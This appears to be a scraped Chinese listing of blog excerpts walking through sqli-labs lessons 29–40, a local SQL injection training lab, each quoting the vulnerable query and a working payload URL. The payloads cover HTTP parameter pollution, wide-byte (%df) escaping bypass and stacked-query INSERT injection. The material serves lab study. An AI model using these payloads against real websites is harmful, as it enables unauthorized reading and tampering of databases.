sqlilabs 1-4】的更多相关文章

Less-29 首先先看下tomcat中的index.jsp文件 在apache的index.php中,sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 因此我们根据HPP的原理,我们直接payload: http://127.0.0.1:8080/sqli-labs/Less-29/index.jsp?id=1&id=-2%27union%20select%201,user(),3--+ 至于如何注入到其他…
Less-30 Less-30与less-29原理是一致的,我们可以看到less-30的sql语句为: 所以payload为: http://127.0.0.1:8080/sqli-labs/Less-30/index.jsp?id=1&id=-2"union%20select%201,user(),3--+…
Less-31 Less-31与上述两个例子的方式是一样的,我们直接看到less-31的sql语句: 所以payload为: http://127.0.0.1:8080/sqli-labs/Less-31/index.jsp?id=1&id=-2%22)union%20select%201,user(),3--+ 总结:从以上三关中,我们主要学习到的是不同服务器对于参数的不同处理,HPP的应用有很多,不仅仅是我们上述列出过WAF一个方面,还有可以执行重复操作,可以执行非法操作等.同时针对WAF的…
Less-32 利用上述的原理,我们可以进行尝试payload为: http://127.0.0.1/sqli-labs/Less-32/?id=-1%df%27union%20select%201,user(),3--+ 可以看到,我们绕过了对于 ' 的过滤.接下来从源代码进行考虑: 上述函数为过滤 ' \ 的函数,将 ' 转为 \' , 将 \ 转为 \\ ,将 " 转为 \".因此此处我们只能考虑background中的第一个思路,添加一个%df后,将%5c吃掉即可. 从inpu…
Less-33 本关和上一关的payload是一样的 http://127.0.0.1/sqli-labs/Less-33/?id=-1%df%27union%20select%201,user(),3--+ 从源代码中可以看到: 此处过滤使用函数addslashes() addslashes() 函数返回在预定义字符之前添加反斜杠的字符串. 预定义字符是: 单引号(') 双引号(") 反斜杠(\) 提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串. Addslashes(…
Less-35 35关和33关是大致的一样的,唯一的区别在于sql语句的不同. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 区别就是id没有被' "符号包括起来,那我们就没有必要去考虑check_addslashes()函数的意义了,直接提交payload: http://127.0.0.1/sqli-labs/Less-35/?id=-1%20%20union%20select%201,user(),3--+…
Less-36 我们直接看到36关的源代码 上面的check_quotes()函数是利用了mysql_real_escape_string()函数进行的过滤. mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符. 下列字符受影响: \x00 \n \r \ ' " \x1a 如果成功,则该函数返回被转义的字符串.如果失败,则返回 false. 但是因mysql我们并没有设置成gbk,所以mysql_real_escape_string()依旧能…
Less-38 学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用. 在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1 可以直接构造如下的payload: http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27…
Less-39 和less-38的区别在于sql语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1 也就是数字型注入,我们可以构造以下的payload: http://127.0.0.1/sqli-labs/Less-39/index.php?id=1;insert%20into%20users(id,username,password)%20values%20(%2739%27,%27less39%27,%27hello%27)--+ 通过数据表…
Less-40 本关的sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1 我们根据sql语句构造以下的payload: http://127.0.0.1/sqli-labs/Less-40/index.php?id=1%27);%20insert%20into%20users(id,username,password)%20values%20(%27109%27,%27hello%27,%27hello%27)%23…